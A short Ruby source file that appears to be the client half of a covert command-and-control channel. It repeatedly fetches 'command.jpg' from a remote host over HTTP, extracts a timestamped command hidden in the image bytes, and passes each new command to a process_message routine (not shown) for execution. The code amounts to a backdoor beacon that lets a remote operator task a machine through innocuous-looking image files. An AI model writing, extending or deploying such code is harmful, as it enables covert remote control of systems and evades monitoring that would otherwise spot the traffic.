require 'openssl'

# can't use constant as it gets redeclared when the require is done and so causes a warning
@dynamic_file_name="jpg"

# The filename to look for
@jpg_image_filename="command.jpg"

# The site to look for the file on
@base_site="www.google.com"

def read_message(image_src, verbose=false)
	page= "/"+image_src

	if verbose
		puts "URL: " + @base_site + page
	end

	Net::HTTP.start(@base_site, 80) { |http|
		response = http.get(page)
 
		if response.code == "200"
	#		puts response.read_body
			image = response.read_body

			i=24
			message = ""
			while image[i] != "\00" && i < image.length
				message += image[i,1]
				i+=1
			end
			return message
		else
			if verbose
				puts "Error code " + response.code + " returned from site"
			end
		end
		return false
	}
end

# Search for commands and act on them
def get_process_commands(verbose)
	message=read_message(@jpg_image_filename, verbose)

	if message==false
		puts "Image not found"
	else
		if /([0-9]*),([^\00]*)\00/.match(message)
			command_time = Time.at($1.to_i)
			command = $2

			if verbose
				puts "Time found: " + command_time.to_s
				puts "Command found: " + command
			end

			if @latest_read == nil || command_time > @latest_read
				@latest_read = command_time

				process_message(command, verbose)
				return true
			else
				if verbose
					puts "Command already seen, ignoring"
				end
			end
		else
			if verbose
				puts "No command found in image"
			end
		end
	end
	return false
end
